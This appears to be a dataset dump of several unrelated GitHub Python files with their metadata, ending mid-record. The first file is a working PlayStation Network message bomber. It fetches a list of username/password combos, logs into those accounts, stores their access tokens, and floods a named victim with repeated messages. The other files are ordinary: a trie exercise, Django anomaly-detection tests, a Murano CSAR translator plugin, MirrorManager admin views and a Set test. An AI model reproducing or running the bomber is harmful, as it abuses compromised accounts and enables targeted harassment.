text stringlengths 4 1.02M | meta dict |
|---|---|
import requests, json, random, time, sys, pickle
from threading import Thread
from Queue import Queue
from psnlib import *
## Config
delay = 3 # Delay between messages (seconds)
comboList = "REDACTED_URL" # Userlist (page was a list of username/password combos)
threads = 2
debug = 1 # Use 1 or 0
## /Config
tokenbank = "tokenbank.p"
q = Queue()
onlyonce = False
def log(msg):
if debug:
print msg
def getTokens():
try:
tokens = pickle.load(open(tokenbank, "rb"))
except EOFError:
tokens = {}
return tokens
def removeToken(email):
tokens = getTokens()
try:
del tokens[email]
except KeyError:
pass
pickle.dump(tokens, open(tokenbank, "wb"))
def addToken(email, token):
tokens = getTokens()
tokens[email] = token
pickle.dump(tokens, open(tokenbank, "wb"))
def bomb():
global onlyonce
while not q.empty():
user = q.get()
email = user.split(":")[0]
password = user.split(":")[1]
accessToken = False
tokens = getTokens()
# Check if token exists
if email in tokens:
log("in file")
accessToken = tokens[email]
while True:
# No access token, get one and store it.
if not accessToken:
log("no token")
response = login(email, password)
# Did it succeed?
if not response or type(response) == bool:
print errors["loginfailed"]
continue
accessToken = response["access_token"]
# Add to tokenbank
addToken(email, accessToken)
log("got token")
response = getMyInfos(accessToken)
# Token is expired
if "error" in response:
removeToken(email)
log("token expired")
else:
log("token worked")
break # All succeeded :)
region = response["region"]
lang = response["language"]
from_ = response["onlineId"]
for key in psnURLS.keys():
psnURLS[key] = psnURLS[key].replace("{{lang}}", lang).replace("{{region}}", region)
# Sending messages
for i in xrange(amount):
result = sendMessage(accessToken, from_, victim, message)
if "sentMessageId" in result:
# print "Message #" + str(i + 1) + " sent."
if onlyonce == False:
print errors["messagesuccess"]
onlyonce = True
else:
# print "Couldn't send message (Victim doesn't exist?) Exiting..."
print errors["messagefailed"]
q.task_done()
sys.exit()
time.sleep(delay)
q.task_done()
# Argument parsing
if len(sys.argv) > 3:
victim = sys.argv[1]
amount = int(sys.argv[2])
message = " ".join(sys.argv[3:])
else:
print "usage: bomber.py <victim> <amount> <message>"
sys.exit()
# Main flow
try:
users = requests.get(comboList, \
headers={"User-Agent" : "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"}).text.strip().replace("\r", "").split("\n")
except:
print "ERROR: Unable to get users list"
sys.exit()
for user in users:
q.put(user)
for i in xrange(2): # Number of threads
t = Thread(target=bomb)
t.start()
| {
"content_hash": "353eadf24398e2a60bb827aeea0c6689",
"timestamp": "",
"source": "github",
"line_count": 145,
"max_line_length": 161,
"avg_line_length": 24.048275862068966,
"alnum_prop": 0.5379982793232004,
"repo_name": "denniskupec/odds-and-ends",
"id": "d9533e12722dba833e738021d2aac3dbf2ec42e8",
"size": "3487",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "psn-message-bomber/mthread.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "PHP",
"bytes": "3605"
},
{
"name": "Python",
"bytes": "14454"
},
{
"name": "Shell",
"bytes": "3409"
}
],
"symlink_target": ""
} |
root = dict()
_end = '_end_'
def make_trie(word):
i = root
current_dict = i
for letter in word:
current_dict = current_dict.setdefault(letter, {})
current_dict[_end] = [word]
return i
#
def in_trie(trie, word):
current_dict = trie
for letter in word:
if letter in current_dict:
current_dict = current_dict[letter]
else:
return False
else:
if _end in current_dict:
return True
else:
return False
T=['he','she','his','hers']
for i in T:
make_trie(i)
for i in root:
print(root[i])
print(root) | {
"content_hash": "5c7f10020c47d724dea2d1a452e5e913",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 58,
"avg_line_length": 18.323529411764707,
"alnum_prop": 0.5457463884430177,
"repo_name": "vin0010/Hackerrank",
"id": "2758700bc6b1e21cd2660537bec8d6a93f210c8e",
"size": "679",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/practice/ahocorasick.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "1882"
},
{
"name": "Java",
"bytes": "10070"
},
{
"name": "Python",
"bytes": "18975"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from apps.processing.ala.models import SamplingFeature, Observation
from django.contrib.gis.geos import GEOSGeometry
from apps.common.models import Process, Property
from psycopg2.extras import DateTimeTZRange
from datetime import timedelta, datetime
from apps.ad.anomaly_detection import get_timeseries
from apps.utils.time import UTC_P0100
from django.conf import settings
from apps.common.models import TimeSlots
from django.utils.dateparse import parse_datetime
from apps.mc.api.views import get_observations
from apps.mc.api.views import get_empty_slots
from functools import partial
from apps.mc.tasks import import_time_slots_from_config
time_range_boundary = '[)'
time_from = datetime(2018, 6, 15, 10, 00, 00)
time_from = time_from.replace(tzinfo=UTC_P0100)
date_time_range = DateTimeTZRange(
time_from,
time_from + timedelta(hours=3),
time_range_boundary
)
time_from_alternative = datetime(2018, 6, 15, 11, 00, 00)
time_from_alternative = time_from_alternative.replace(tzinfo=UTC_P0100)
date_time_range_alternative = DateTimeTZRange(
time_from_alternative,
time_from_alternative + timedelta(hours=2),
time_range_boundary
)
time_from_no_data = datetime(2018, 9, 15, 00, 00, 00)
time_from_no_data = time_from_no_data.replace(tzinfo=UTC_P0100)
date_time_range_no_data = DateTimeTZRange(
time_from_no_data,
time_from_no_data + timedelta(hours=24),
time_range_boundary
)
observation_from = datetime(2018, 6, 15, 10, 00, 00)
observation_from = observation_from.replace(tzinfo=UTC_P0100)
first_output_observation_time_range = DateTimeTZRange(
observation_from,
observation_from + timedelta(hours=1),
time_range_boundary
)
observation_from = datetime(2018, 6, 15, 12, 00, 00)
observation_from = observation_from.replace(tzinfo=UTC_P0100)
last_output_observation_time_range = DateTimeTZRange(
observation_from,
observation_from + timedelta(hours=1),
time_range_boundary
)
def get_time_series_test(
station_name,
time_range,
observed_property="air_temperature",
observation_provider_model=Observation,
num_time_slots=None):
topic_config = settings.APPLICATION_MC.TOPICS['drought']
observation_provider_model_name = f"{observation_provider_model.__module__}.{observation_provider_model.__name__}"
prop_config = topic_config['properties'][observed_property]
process = Process.objects.get(
name_id=prop_config['observation_providers'][
observation_provider_model_name]["process"])
station = SamplingFeature.objects.get(name=station_name)
prop = Property.objects.get(name_id=observed_property)
ts_config_id = topic_config['time_slots'][0]
ts_config = settings.APPLICATION_MC.TIME_SLOTS[ts_config_id]
zero = parse_datetime(ts_config['zero'])
frequency = ts_config['frequency']
range_from = ts_config['range_from']
range_to = ts_config['range_to']
t_name = ts_config['name']
t = TimeSlots.objects.get(
name_id='1_hour_slot'
)
time_slots = get_empty_slots(t, time_range)
if num_time_slots is None:
num_time_slots = len(time_slots)
get_observations_func = partial(
get_observations,
time_slots,
prop,
observation_provider_model,
station,
process,
t
)
return get_timeseries(
phenomenon_time_range=time_range,
num_time_slots=num_time_slots,
get_observations=get_observations_func
)
# Running tests and examples
# all tests - ./dcmanage.sh test
# run tests in app- ./dcmanage.sh test apps.mc
# run single TestCase - ./dcmanage.sh test apps.mc.tests.TimeSeriesTestCase
# run single test - ./dcmanage.sh test apps.mc.tests.TimeSeriesTestCase.test_properties_response_status
class TimeSeriesTestCase(TestCase):
def setUp(self):
am_process = Process.objects.create(
name_id='apps.common.aggregate.arithmetic_mean',
name='arithmetic mean'
)
station = SamplingFeature.objects.create(
id_by_provider="11359201",
name="Brno",
geometry=GEOSGeometry('POINT (1847520.94 6309563.27)', srid=3857)
)
station_2 = SamplingFeature.objects.create(
id_by_provider="brno2_id_by_provider",
name="Brno2",
geometry=GEOSGeometry('POINT (1847520.94 6309563.27)', srid=3857)
)
at_prop = Property.objects.create(
name_id='air_temperature',
name='air temperature',
unit='°C',
default_mean=am_process
)
Property.objects.create(
name_id='ground_air_temperature',
name='ground air temperature',
unit='°C',
default_mean=am_process
)
import_time_slots_from_config()
t = TimeSlots.objects.get(
name_id='1_hour_slot'
)
time_from = datetime(2018, 6, 15, 11, 00, 00)
time_from = time_from.replace(tzinfo=UTC_P0100)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station_2,
procedure=am_process,
result=1.5,
time_slots=t,
phenomenon_time_range=DateTimeTZRange(
time_from,
time_from + timedelta(hours=1),
time_range_boundary
)
)
time_from = datetime(2018, 6, 15, 12, 00, 00)
time_from = time_from.replace(tzinfo=UTC_P0100)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station_2,
procedure=am_process,
result=1.5,
time_slots=t,
phenomenon_time_range=DateTimeTZRange(
time_from,
time_from + timedelta(hours=1),
time_range_boundary
)
)
time_from = datetime(2018, 6, 14, 13, 00, 00)
time_from = time_from.replace(tzinfo=UTC_P0100)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station,
procedure=am_process,
result=1.5,
time_slots=t,
phenomenon_time_range=DateTimeTZRange(
time_from,
time_from + timedelta(hours=1),
time_range_boundary
)
)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station,
procedure=am_process,
result=1,
time_slots=t,
phenomenon_time_range=first_output_observation_time_range
)
time_from = datetime(2018, 6, 15, 11, 00, 00)
time_from = time_from.replace(tzinfo=UTC_P0100)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station,
procedure=am_process,
result=1000,
time_slots=t,
phenomenon_time_range=DateTimeTZRange(
time_from,
time_from + timedelta(hours=1),
time_range_boundary
)
)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station,
procedure=am_process,
result=1.5,
time_slots=t,
phenomenon_time_range=last_output_observation_time_range
)
time_from = datetime(2018, 6, 16, 13, 00, 00)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station,
procedure=am_process,
result=1.5,
time_slots=t,
phenomenon_time_range=DateTimeTZRange(
time_from,
time_from + timedelta(hours=1),
time_range_boundary
)
)
def test_create_process(self):
process = Process.objects.all()
self.assertGreater(len(process), 0)
def test_create_property(self):
property = Property.objects.all()
self.assertGreater(len(property), 0)
def test_create_observation(self):
observation = Observation.objects.all()
self.assertGreater(len(observation), 0)
def test_create_station(self):
station = SamplingFeature.objects.get(name="Brno")
self.assertEqual(station.name, 'Brno')
def test_property_values(self):
ts = get_time_series_test('Brno', date_time_range)
self.assertEqual(ts['property_values'], [1.000, 1000.000, 1.500])
def test_empty_property_values(self):
ts = get_time_series_test('Brno', date_time_range_no_data, num_time_slots=0)
self.assertEqual(len(ts['property_values']), 0)
self.assertEqual(len(ts['property_anomaly_rates']), 0)
def test_null_property_values(self):
ts = get_time_series_test('Brno', date_time_range_no_data, num_time_slots=2)
self.assertEqual(len(ts['property_values']), 2)
self.assertEqual(len(ts['property_anomaly_rates']), 2)
self.assertEqual(ts['property_values'], [None, None])
def test_count(self):
ts = get_time_series_test('Brno', date_time_range)
self.assertEqual(len(ts['property_values']), 3)
def test_property_values_count_equal_anomaly_rates_count(self):
ts = get_time_series_test('Brno', date_time_range)
self.assertEqual(len(ts['property_values']), len(ts['property_anomaly_rates']))
def test_out_bounds(self):
ts = get_time_series_test('Brno', date_time_range)
lower_inc = ts['phenomenon_time_range'].lower_inc
upper_inc = ts['phenomenon_time_range'].upper_inc
self.assertTrue(lower_inc)
self.assertFalse(upper_inc)
def test_time_range_in_contains_out(self):
ts = get_time_series_test('Brno', date_time_range)
out_lower = ts['phenomenon_time_range'].lower
out_upper = ts['phenomenon_time_range'].upper
self.assertTrue(out_lower >= date_time_range.lower)
self.assertTrue(out_upper <= date_time_range.upper)
def test_in_bounds(self):
ts = get_time_series_test('Brno', date_time_range)
lower_inc = date_time_range.lower_inc
upper_inc = date_time_range.upper_inc
self.assertTrue(lower_inc)
self.assertFalse(upper_inc)
def test_alternative_feature(self):
ts = get_time_series_test('Brno2', date_time_range_alternative)
self.assertEqual(ts['property_values'], [1.500, 1.500])
| {
"content_hash": "9bc7c0f1cab86d3888a48993dcfbf7ea",
"timestamp": "",
"source": "github",
"line_count": 312,
"max_line_length": 118,
"avg_line_length": 33.95192307692308,
"alnum_prop": 0.6225809496837534,
"repo_name": "gis4dis/poster",
"id": "6e6ab9520e26b74e9fbb85a3af34b24de10893a1",
"size": "10595",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/ad/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "782"
},
{
"name": "Dockerfile",
"bytes": "586"
},
{
"name": "HTML",
"bytes": "12793"
},
{
"name": "Jupyter Notebook",
"bytes": "23402"
},
{
"name": "Makefile",
"bytes": "1178"
},
{
"name": "Python",
"bytes": "493523"
},
{
"name": "Shell",
"bytes": "1729"
}
],
"symlink_target": ""
} |
import os
import shutil
import six
import sys
import yaml
import zipfile
from murano.packages import exceptions
from murano.packages import package_base
from toscaparser.common import exception as csar_exception
from toscaparser.prereq import csar
from toscaparser.tosca_template import ToscaTemplate
from translator.hot.tosca_translator import TOSCATranslator
CSAR_RESOURCES_DIR_NAME = 'Resources/'
CSAR_FILES_DIR_NAME = 'CSARFiles/'
CSAR_ENV_DIR_NAME = 'CSAREnvironments/'
class YAQL(object):
def __init__(self, expr):
self.expr = expr
class Dumper(yaml.SafeDumper):
pass
def yaql_representer(dumper, data):
return dumper.represent_scalar(u'!yaql', data.expr)
Dumper.add_representer(YAQL, yaql_representer)
class CSARPackage(package_base.PackageBase):
def __init__(self, format_name, runtime_version, source_directory,
manifest):
super(CSARPackage, self).__init__(
format_name, runtime_version, source_directory, manifest)
self._translated_class = None
self._source_directory = source_directory
self._translated_ui = None
@property
def classes(self):
return self.full_name,
@property
def requirements(self):
return {}
@property
def ui(self):
if not self._translated_ui:
self._translated_ui = self._translate_ui()
return self._translated_ui
def get_class(self, name):
if name != self.full_name:
raise exceptions.PackageClassLoadError(
name, 'Class not defined in this package')
if not self._translated_class:
self._translate_class()
return self._translated_class, '<generated code>'
def _translate_class(self):
csar_file = os.path.join(self._source_directory, 'csar.zip')
shutil.copy(csar_file, self.get_resource(self.full_name))
if not os.path.isfile(csar_file):
raise exceptions.PackageClassLoadError(
self.full_name, 'File with class definition not found')
csar_obj = csar.CSAR(csar_file)
try:
csar_obj.validate()
except csar_exception.ValidationError as ve:
raise exceptions.PackageFormatError('Not a CSAR archive: ' +
str(ve))
translated = {
'Name': self.full_name,
'Extends': 'io.murano.Application'
}
csar_envs_path = os.path.join(self._source_directory,
CSAR_RESOURCES_DIR_NAME,
CSAR_ENV_DIR_NAME)
validate_csar_parameters = (not os.path.isdir(csar_envs_path) or
not os.listdir(csar_envs_path))
tosca = csar_obj.get_main_template_yaml()
parameters = CSARPackage._build_properties(tosca,
validate_csar_parameters)
parameters.update(CSARPackage._translate_outputs(tosca))
translated['Properties'] = parameters
hot = yaml.load(self._translate('tosca', csar_obj.csar,
parameters, True))
files = CSARPackage._translate_files(self._source_directory)
template_file = os.path.join(self._source_directory,
CSAR_RESOURCES_DIR_NAME, 'template.yaml')
with open(template_file, 'w') as outfile:
outfile.write(yaml.safe_dump(hot))
translated.update(CSARPackage._generate_workflow(hot, files))
self._translated_class = yaml.dump(translated, Dumper=Dumper,
default_style='"')
def _translate(self, sourcetype, path, parsed_params, a_file):
output = None
if sourcetype == "tosca":
tosca = ToscaTemplate(path, parsed_params, a_file)
translator = TOSCATranslator(tosca, parsed_params)
output = translator.translate()
return output
@staticmethod
def _build_properties(csar, csar_parameters):
result = {
'generatedHeatStackName': {
'Contract': YAQL('$.string()'),
'Usage': 'Out'
},
'hotEnvironment': {
'Contract': YAQL('$.string()'),
'Usage': 'In'
}
}
if csar_parameters:
params_dict = {}
for key, value in (csar.get('parameters') or {}).items():
param_contract = \
CSARPackage._translate_param_to_contract(value)
params_dict[key] = param_contract
result['templateParameters'] = {
'Contract': params_dict,
'Default': {},
'Usage': 'In'
}
else:
result['templateParameters'] = {
'Contract': {},
'Default': {},
'Usage': 'In'
}
return result
@staticmethod
def _translate_param_to_contract(value):
contract = '$'
parameter_type = value['type']
if parameter_type in ('string', 'comma_delimited_list', 'json'):
contract += '.string()'
elif parameter_type == 'integer':
contract += '.int()'
elif parameter_type == 'boolean':
contract += '.bool()'
else:
raise ValueError('Unsupported parameter type ' + parameter_type)
constraints = value.get('constraints') or []
for constraint in constraints:
translated = CSARPackage._translate_constraint(constraint)
if translated:
contract += translated
result = YAQL(contract)
return result
@staticmethod
def _translate_outputs(csar):
result = {}
for key in (csar.get('outputs') or {}).keys():
result[key] = {
"Contract": YAQL("$.string()"),
"Usage": "Out"
}
return result
@staticmethod
def _translate_files(source_directory):
source = os.path.join(source_directory, 'csar.zip')
dest_dir = os.path.join(source_directory, CSAR_RESOURCES_DIR_NAME,
CSAR_FILES_DIR_NAME)
with zipfile.ZipFile(source, "r") as z:
z.extractall(dest_dir)
csar_files_path = os.path.join(source_directory,
CSAR_RESOURCES_DIR_NAME,
CSAR_FILES_DIR_NAME)
return CSARPackage._build_csar_resources(csar_files_path)
@staticmethod
def _build_csar_resources(basedir):
result = []
if os.path.isdir(basedir):
for root, _, files in os.walk(os.path.abspath(basedir)):
for f in files:
full_path = os.path.join(root, f)
relative_path = os.path.relpath(full_path, basedir)
result.append(relative_path)
return result
@staticmethod
def _translate_constraint(constraint):
if 'equal' in constraint:
return CSARPackage._translate_equal_constraint(
constraint['equal'])
elif 'valid_values' in constraint:
return CSARPackage._translate_valid_values_constraint(
constraint['valid_values'])
elif 'length' in constraint:
return CSARPackage._translate_length_constraint(
constraint['length'])
elif 'in_range' in constraint:
return CSARPackage._translate_range_constraint(
constraint['in_range'])
elif 'allowed_pattern' in constraint:
return CSARPackage._translate_allowed_pattern_constraint(
constraint['allowed_pattern'])
@staticmethod
def _translate_equal_constraint(value):
return ".check($ == {0})".format(value)
@staticmethod
def _translate_allowed_pattern_constraint(value):
return ".check(matches($, '{0}'))".format(value)
@staticmethod
def _translate_valid_values_constraint(values):
return '.check($ in list({0}))'.format(
', '.join([CSARPackage._format_value(v) for v in values]))
@staticmethod
def _translate_length_constraint(value):
if 'min' in value and 'max' in value:
return '.check(len($) >= {0} and len($) <= {1})'.format(
int(value['min']), int(value['max']))
elif 'min' in value:
return '.check(len($) >= {0})'.format(int(value['min']))
elif 'max' in value:
return '.check(len($) <= {0})'.format(int(value['max']))
@staticmethod
def _translate_range_constraint(value):
if 'min' in value and 'max' in value:
return '.check($ >= {0} and $ <= {1})'.format(
int(value['min']), int(value['max']))
elif 'min' in value:
return '.check($ >= {0})'.format(int(value['min']))
elif 'max' in value:
return '.check($ <= {0})'.format(int(value['max']))
@staticmethod
def _format_value(value):
if isinstance(value, six.string_types):
return u"{}".format(value)
return six.text_type(value)
@staticmethod
def _generate_workflow(csar, files):
hot_files_map = {}
for f in files:
file_path = "$resources.string('{0}{1}')".format(
CSAR_FILES_DIR_NAME, f)
hot_files_map['../{0}'.format(f)] = YAQL(file_path)
hot_env = YAQL("$.hotEnvironment")
copy_outputs = []
for key in (csar.get('outputs') or {}).keys():
copy_outputs.append({YAQL('$.' + key): YAQL('$outputs.' + key)})
deploy = [
{YAQL('$environment'): YAQL(
"$.find('io.murano.Environment').require()"
)},
{YAQL('$reporter'): YAQL(
"new('io.murano.system.StatusReporter', "
"environment => $environment)")},
{
'If': YAQL('$.getAttr(generatedHeatStackName) = null'),
'Then': [
YAQL("$.setAttr(generatedHeatStackName, "
"'{0}_{1}'.format(randomName(), id($environment)))")
]
},
{YAQL('$stack'): YAQL(
"new('io.murano.system.HeatStack', $environment, "
"name => $.getAttr(generatedHeatStackName))")},
YAQL("$reporter.report($this, "
"'Application deployment has started')"),
{YAQL('$resources'): YAQL("new('io.murano.system.Resources')")},
{YAQL('$template'): YAQL("$resources.yaml('template.yaml')")},
YAQL('$stack.setTemplate($template)'),
{YAQL('$parameters'): YAQL("$.templateParameters")},
YAQL('$stack.setParameters($parameters)'),
{YAQL('$files'): hot_files_map},
YAQL('$stack.setFiles($files)'),
{YAQL('$hotEnv'): hot_env},
{
'If': YAQL("bool($hotEnv)"),
'Then': [
{YAQL('$envRelPath'): YAQL("'{0}' + $hotEnv".format(
CSAR_ENV_DIR_NAME))},
{YAQL('$hotEnvContent'): YAQL("$resources.string("
"$envRelPath)")},
YAQL('$stack.setHotEnvironment($hotEnvContent)')
]
},
YAQL("$reporter.report($this, 'Stack creation has started')"),
{
'Try': [YAQL('$stack.push()')],
'Catch': [
{
'As': 'e',
'Do': [
YAQL("$reporter.report_error($this, $e.message)"),
{'Rethrow': None}
]
}
],
'Else': [
{YAQL('$outputs'): YAQL('$stack.output()')},
{'Do': copy_outputs},
YAQL("$reporter.report($this, "
"'Stack was successfully created')"),
YAQL("$reporter.report($this, "
"'Application deployment has finished')"),
]
}
]
destroy = [
{YAQL('$environment'): YAQL(
"$.find('io.murano.Environment').require()"
)},
{YAQL('$stack'): YAQL(
"new('io.murano.system.HeatStack', $environment, "
"name => $.getAttr(generatedHeatStackName))")},
YAQL('$stack.delete()')
]
return {
'Workflow': {
'deploy': {
'Body': deploy
},
'destroy': {
'Body': destroy
}
}
}
@staticmethod
def _translate_ui_parameters(tosca, title):
result_groups = []
used_inputs = set()
tosca_inputs = tosca.get('topology_template').get('inputs') or {}
fields = []
properties = []
for input in tosca_inputs:
input_value = tosca_inputs.get(input)
if input_value:
fields.append(CSARPackage._translate_ui_parameter(
input, input_value))
used_inputs.add(input)
properties.append(input)
if fields or properties:
result_groups.append((fields, properties))
rest_group = []
properties = []
for key, value in six.iteritems(tosca_inputs):
if key not in used_inputs:
rest_group.append(CSARPackage._translate_ui_parameter(
key, value))
properties.append(key)
if rest_group:
result_groups.append((rest_group, properties))
return result_groups
@staticmethod
def _translate_ui_parameter(name, parameter_spec):
translated = {
'name': name,
'label': name.title().replace('_', ' ')
}
parameter_type = parameter_spec['type']
if parameter_type == 'integer':
translated['type'] = 'integer'
elif parameter_type == 'boolean':
translated['type'] = 'boolean'
else:
# string, json, and comma_delimited_list parameters are all
# displayed as strings in UI. Any unsupported parameter would also
# be displayed as strings.
translated['type'] = 'string'
label = parameter_spec.get('label')
if label:
translated['label'] = label
if 'description' in parameter_spec:
translated['description'] = parameter_spec['description']
if 'default' in parameter_spec:
translated['initial'] = parameter_spec['default']
translated['required'] = False
else:
translated['required'] = True
constraints = parameter_spec.get('constraints') or []
translated_constraints = []
for constraint in constraints:
if 'length' in constraint:
spec = constraint['length']
if 'min' in spec:
translated['minLength'] = max(
translated.get('minLength', -sys.maxint - 1),
int(spec['min']))
if 'max' in spec:
translated['maxLength'] = min(
translated.get('maxLength', sys.maxint),
int(spec['max']))
elif 'range' in constraint:
spec = constraint['range']
if 'min' in spec and 'max' in spec:
ui_constraint = {
'expr': YAQL('$ >= {0} and $ <= {1}'.format(
spec['min'], spec['max']))
}
elif 'min' in spec:
ui_constraint = {
'expr': YAQL('$ >= {0}'.format(spec['min']))
}
else:
ui_constraint = {
'expr': YAQL('$ <= {0}'.format(spec['max']))
}
if 'description' in constraint:
ui_constraint['message'] = constraint['description']
translated_constraints.append(ui_constraint)
elif 'valid_values' in constraint:
values = constraint['valid_values']
ui_constraint = {
'expr': YAQL('$ in list({0})'.format(', '.join(
[CSARPackage._format_value(v) for v in values])))
}
if 'description' in constraint:
ui_constraint['message'] = constraint['description']
translated_constraints.append(ui_constraint)
elif 'allowed_pattern' in constraint:
pattern = constraint['allowed_pattern']
ui_constraint = {
'expr': {
'regexpValidator': pattern
}
}
if 'description' in constraint:
ui_constraint['message'] = constraint['description']
translated_constraints.append(ui_constraint)
if translated_constraints:
translated['validators'] = translated_constraints
return translated
@staticmethod
def _generate_application_ui(groups, type_name, package_name=None,
package_version=None):
app = {
'?': {
'type': type_name
}
}
if package_name:
app['?']['package'] = package_name
if package_version:
app['?']['classVersion'] = package_version
for i, record in enumerate(groups):
section = app.setdefault('templateParameters', {})
for property_name in record[1]:
section[property_name] = YAQL(
'$.group{0}.{1}'.format(i, property_name))
return app
def _translate_ui(self):
tosca = csar.CSAR(os.path.join(self._source_directory, 'csar.zip'))\
.get_main_template_yaml()
groups = CSARPackage._translate_ui_parameters(tosca, self.description)
forms = []
for i, record in enumerate(groups):
forms.append({'group{0}'.format(i): {'fields': record[0]}})
translated = {
'Version': 2.2,
'Application': CSARPackage._generate_application_ui(
groups, self.full_name, self.full_name, str(self.version)),
'Forms': forms
}
return yaml.dump(translated, Dumper=Dumper, default_style='"')
| {
"content_hash": "dec7c043389e8f15613df9aa5f3c5f7d",
"timestamp": "",
"source": "github",
"line_count": 524,
"max_line_length": 78,
"avg_line_length": 35.912213740458014,
"alnum_prop": 0.5078648102880221,
"repo_name": "DavidPurcell/murano_temp",
"id": "696bc1802b0361964449bf5c40e4a16d3586585f",
"size": "19391",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contrib/plugins/murano_heat-translator_plugin/plugin/csar_package.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "304"
},
{
"name": "Mako",
"bytes": "2026"
},
{
"name": "PowerShell",
"bytes": "2966"
},
{
"name": "Puppet",
"bytes": "86"
},
{
"name": "Python",
"bytes": "1758483"
},
{
"name": "Ruby",
"bytes": "444"
},
{
"name": "Shell",
"bytes": "34202"
}
],
"symlink_target": ""
} |
'''
MirrorManager2 admin flask controller.
'''
import flask
from flask.ext.admin import BaseView, expose
try:
from flask.ext.admin.contrib.sqla import ModelView
except ImportError: # pragma: no cover
# The module was renamed in flask-admin
from flask.ext.admin.contrib.sqlamodel import ModelView
from mirrormanager2.app import APP, ADMIN, SESSION, is_mirrormanager_admin
from mirrormanager2.lib import model
class MMModelView(ModelView):
''' Base class for the Mirrormanager preventing access to the admin
interface to non-admin.
'''
def is_accessible(self):
''' Prevent access to non-admin user. '''
admin = False
if hasattr(flask.g, 'fas_user') and flask.g.fas_user:
admin = is_mirrormanager_admin(flask.g.fas_user)
return admin
class DirectoryView(MMModelView):
''' View of the Host table specifying which field of the table should
be shown (and their order).
'''
# Override displayed fields
column_list = ('name', 'readable', 'ctime')
VIEWS = [
MMModelView(model.Arch, SESSION),
MMModelView(model.Category, SESSION),
MMModelView(model.Country, SESSION, category='Country'),
MMModelView(model.CountryContinentRedirect, SESSION, category='Country'),
MMModelView(model.EmbargoedCountry, SESSION, category='Country'),
DirectoryView(model.Directory, SESSION, category='Directory'),
DirectoryView(model.DirectoryExclusiveHost, SESSION, category='Directory'),
MMModelView(model.FileDetail, SESSION, category='File'),
MMModelView(model.FileDetailFileGroup, SESSION, category='File'),
MMModelView(model.FileGroup, SESSION, category='File'),
MMModelView(model.Host, SESSION, category='Host'),
MMModelView(model.HostAclIp, SESSION, category='Host'),
MMModelView(model.HostCategory, SESSION, category='Host'),
MMModelView(model.HostCategoryDir, SESSION, category='Host'),
MMModelView(model.HostCategoryUrl, SESSION, category='Host'),
MMModelView(model.HostCountry, SESSION, category='Host'),
MMModelView(model.HostCountryAllowed, SESSION, category='Host'),
MMModelView(model.HostLocation, SESSION, category='Host'),
MMModelView(model.HostNetblock, SESSION, category='Host'),
MMModelView(model.HostPeerAsn, SESSION, category='Host'),
MMModelView(model.HostStats, SESSION, category='Host'),
MMModelView(model.Location, SESSION),
MMModelView(model.NetblockCountry, SESSION),
MMModelView(model.Product, SESSION),
MMModelView(model.Repository, SESSION, category='Repository'),
MMModelView(model.RepositoryRedirect, SESSION, category='Repository'),
MMModelView(model.Site, SESSION, category='Site'),
MMModelView(model.SiteAdmin, SESSION, category='Site'),
MMModelView(model.SiteToSite, SESSION, category='Site'),
MMModelView(model.Version, SESSION),
]
if APP.config.get('MM_AUTHENTICATION', None) == 'local':
VIEWS.append(MMModelView(model.User, SESSION))
VIEWS.append(MMModelView(model.Group, SESSION))
VIEWS.append(MMModelView(model.UserVisit, SESSION))
for view in VIEWS:
ADMIN.add_view(view)
| {
"content_hash": "9d2a8f0dc39b2fb3bdbd6df9a8ecfa32",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 79,
"avg_line_length": 39.54430379746835,
"alnum_prop": 0.7285531370038413,
"repo_name": "Devyani-Divs/mirrormanager2",
"id": "7068e1cbfb02b60dd717f781024fc2c48fab6874",
"size": "4109",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mirrormanager2/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "8488"
},
{
"name": "HTML",
"bytes": "545977"
},
{
"name": "Perl",
"bytes": "23467"
},
{
"name": "Python",
"bytes": "526386"
},
{
"name": "Shell",
"bytes": "6782"
}
],
"symlink_target": ""
} |
from UnitTest import UnitTest
# XXX fails with a JavaScript error: "In application LibTest -
# undefined: set is not defined
# pyjslib.py, line 1484
# pyjslib.py, line 206
# SetTest.py, line 5
# try:
# # try to use the built-in set type
# Set = set
# except NameError:
# # fall back to sets module
# from sets import Set
from sets import Set
class SetTest(UnitTest):
def testInit(self):
value = Set(['a', 'b', 'c'])
self.assertTrue('b' in value)
self.assertTrue('d' not in value)
def testAdd(self):
value = Set()
value.add("a")
value.add("b")
value.add("a")
self.assertTrue('a' in value)
self.assertTrue('c' not in value)
self.assertTrue(len(value) is 2)
def testRemove(self):
value = Set(['a', 'b', 'c'])
value.remove('a')
self.assertTrue('a' not in value)
self.assertTrue('b' in value)
def testIter(self):
items = ['a', 'b', 'c']
value = Set(items)
for i in value:
items.remove(i)
self.assertTrue(len(items) is 0)
def testAddObject(self):
v1 = DummyClass('a')
v2 = DummyClass('b')
v3 = DummyClass('b')
v4 = DummyClass('c')
value = Set()
value.add(v1)
value.add(v2)
value.add(v1)
value.add(v3)
self.assertTrue(v1 in value)
self.assertTrue(v2 in value)
self.assertTrue(v3 in value)
self.assertTrue(v4 not in value)
self.assertTrue(len(value) is 3)
class DummyClass:
def __init__(self, value):
self.value = value
def getValue(self):
return self.value
| {
"content_hash": "ab7a93a2a824678cfe8e663ca098aafa",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 62,
